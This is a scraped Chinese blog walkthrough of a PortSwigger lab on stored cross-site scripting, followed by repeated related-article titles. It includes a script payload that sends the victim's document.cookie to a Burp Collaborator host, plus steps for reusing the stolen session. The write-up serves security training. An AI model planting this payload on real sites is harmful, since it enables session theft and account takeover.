Lab: Exploiting cross-site scripting to steal cookies:利用XSS竊取Cookie

阿新 • • 發佈：2021-08-24

靶場內容

本實驗包含部落格評論功能中的儲存型 XSS漏洞。一個模擬的受害者使用者在釋出後檢視所有評論。為解決實驗室，利用該漏洞竊取受害者的會話cookie，然後使用該cookie來冒充受害者。

注意
為了防止 Academy 平臺被用來攻擊第三方，我們的防火牆會阻止實驗室與任意外部系統之間的互動。要解決實驗室問題，您應該使用 Burp Collaborator 的預設公共伺服器 ( burpcollaborator.net)。

一些使用者會注意到這個實驗室有一個不需要 Burp Collaborator 的替代解決方案。然而，它遠沒有洩露 cookie 那麼微妙。

解決方法

XSS竊取Cookie老生常談了，最喜歡用的就是竊取Cookie了

這個靶場還是很細的：
找到一個評論區，將JavaScript程式碼複製到評論區

<script>
fetch('https://8r0adoyya8wnsy5t6m21h3twenkd82.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

fetch裡面的URL內容是Burp Collaborator Client出來的payload
之後開啟Burp Collaborator Client，可以發現有個HTTP報文
點開它，裡面是管理員的session

之後使用這個cookie去覆蓋home頁面的cookie就可以解決戰鬥了

本文來自部落格園，作者：{Zeker62}，轉載請註明原文連結：https://www.cnblogs.com/Zeker62/p/15182658.html

Lab: Exploiting cross-site scripting to steal cookies:利用XSS竊取Cookie

靶場內容本實驗包含部落格評論功能中的儲存型 XSS漏洞。一個模擬的受害者使用者在釋出後檢視所有評論。為解決實驗室，利用該漏洞竊取受害者的會話cookie，然後使用該cookie來冒充受害者。

Cross-Site Scripting (XSS) Attack Lab Solution Seed

Cross-Site Scripting (XSS) Attack Lab 準備工作啟動伺服器 sudo apache2ctl start or sudo service apache2 start

XSS（Cross Site Scripting）攻擊

xss（Cross Site Scripting）：跨站指令碼攻擊原理：惡意攻擊者在web頁面中會插入一些惡意的script程式碼。當用戶瀏覽該頁面的時候，那麼嵌入到web頁面中script程式碼會執行，因此會達到惡意攻擊使用者的目的。那麼

OSCP Security Technology - Cross-Site Scripting(XSS)

OSCP Security Technology - Cross-Site Scripting(XSS) Installing XSS & MySQL FILE https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/

Cross Site Scripting Prevention Cheat Sheet¶

Cross Site Scripting Prevention Cheat Sheet RULE #3 - JavaScript Encode Before Inserting Untrusted Data into JavaScript Data Values

Cross-Site Scripting (xss)

在聊xss之前先討論下同源策略核心安全可以參考這個連結https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy

[Whole Web] CROSS SITE SCRIPTING (XSS)

Cross-Site Scripting (XSS) is avulnerabilitythat allows the attacker to inject their own JavaScript code into a vulnerable website. This gives the attacker full control of any browser tab that loads

Lab: Exploiting XSS to perform CSRF：利用XSS執行CSRF

靶場內容本實驗包含部落格評論功能中的儲存型 XSS漏洞。為解決實驗室問題，利用該漏洞進行CSRF攻擊，更改檢視博文評論的人的郵箱。

跨站(cross-site)、跨域(cross-origin)、SameSite與XMLHttpRequest.withCredentials

概念說明瀏覽器使用同源策略在提高了安全性的同時也會帶來一些不變，常見，如：不同源間的cookie或其它資料的訪問。

XSS跨站指令碼攻擊（Cross site script）解析及靶場復現

1. 概述跨轉指令碼攻擊（Cross site script），為區分CSS層疊樣式表，故稱為XSS。XSS屬於客戶端攻擊，通常指攻擊者在網頁中嵌入Javascritp編寫的惡意程式碼指令碼，當用戶使用瀏覽器瀏覽被嵌入惡意程式碼的網站時，

Lab: Exploiting Java deserialization with Apache Commons：使用 Apache Commons 開發的 Java 反序列化（ysoserial的使用）

靶場內容本實驗使用基於序列化的會話機制並載入 Apache Commons Collections 庫。儘管您沒有原始碼訪問許可權，但您仍然可以使用預先構建的小工具鏈來利用此實驗室。

Lab: Exploiting PHP deserialization with a pre-built gadget chain：利用預先構建的小工具鏈利用 PHP 反序列化（PHPGGC的使用）

靶場內容該實驗室具有使用簽名 cookie 的基於序列化的會話機制。它還使用通用的 PHP 框架。儘管您沒有原始碼訪問許可權，但您仍然可以使用預構建的小工具鏈來利用此實驗室的不安全反序列化。

Lab: Exploiting Ruby deserialization using a documented gadget chain：使用小工具鏈利用 Ruby 反序列化（Ruby 2.x Universal RCE Gadget Chain指令碼使用）

靶場內容：本實驗使用基於序列化的會話機制和 Ruby on Rails 框架。有一個記錄的漏洞利用可以通過此框架中的小工具鏈實現遠端程式碼執行。

Exploiting clickjacking vulnerability to trigger DOM-based XSS：利用點選劫持漏洞觸發基於DOM的XSS

實驗內容該實驗室包含一個由點選觸發的XSS漏洞。構建一個點選劫持攻擊，欺騙使用者點選“點選我”按鈕來呼叫該print()函式。

Lab: Manipulating the WebSocket handshake to exploit vulnerabilities 操縱 WebSocket 握手以利用漏洞

靶場內容：該線上商店具有使用WebSockets實現的實時聊天功能。它有一個激進但有缺陷的 XSS 過濾器。

ERROR: Could not install packages due to an EnvironmentError: [WinError 145] 目錄不是空的。: 'D:\\Python\\Python\\venv\\Lib\\site-packages\\~jango\\contrib\\postgres\\locale\\fr&

(venv) D:\\python_learn\\restfullearn\\RESTAPI>pip install django-filter Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple

Lab: Exploiting cross-site scripting to steal cookies:利用XSS竊取Cookie

靶場內容

解決方法

Lab: Exploiting cross-site scripting to steal cookies:利用XSS竊取Cookie

Cross-Site Scripting (XSS) Attack Lab Solution Seed

XSS（Cross Site Scripting）攻擊

OSCP Security Technology - Cross-Site Scripting(XSS)

Cross Site Scripting Prevention Cheat Sheet¶

Cross-Site Scripting (xss)

[Whole Web] CROSS SITE SCRIPTING (XSS)

Lab: Exploiting XSS to perform CSRF：利用XSS執行CSRF

跨站(cross-site)、跨域(cross-origin)、SameSite與XMLHttpRequest.withCredentials

XSS跨站指令碼攻擊（Cross site script）解析及靶場復現

Lab: Exploiting Java deserialization with Apache Commons：使用 Apache Commons 開發的 Java 反序列化（ysoserial的使用）

Lab: Exploiting PHP deserialization with a pre-built gadget chain：利用預先構建的小工具鏈利用 PHP 反序列化（PHPGGC的使用）

Lab: Exploiting Ruby deserialization using a documented gadget chain：使用小工具鏈利用 Ruby 反序列化（Ruby 2.x Universal RCE Gadget Chain指令碼使用）

Exploiting clickjacking vulnerability to trigger DOM-based XSS：利用點選劫持漏洞觸發基於DOM的XSS

Lab: Manipulating the WebSocket handshake to exploit vulnerabilities 操縱 WebSocket 握手以利用漏洞

ERROR: Could not install packages due to an EnvironmentError: [WinError 145] 目錄不是空的。: 'D:\\Python\\Python\\venv\\Lib\\site-packages\\~jango\\contrib\\postgres\\locale\\fr&

【maven】Failed to execute goal org.apache.maven.plugins:maven-site-plugin:3.3:site (default-site)

思科路由器×××配置-- 動態 site-to-site ×××(上)

Java Selenium中禁用Chrome實驗性選項same-site-by-default-cookies和cookies-without-same-site-must-be-secure

vyos site-to-site ipsec simple experiment

Lab: Exploiting cross-site scripting to steal cookies:利用XSS竊取Cookie

靶場內容

解決方法

相關推薦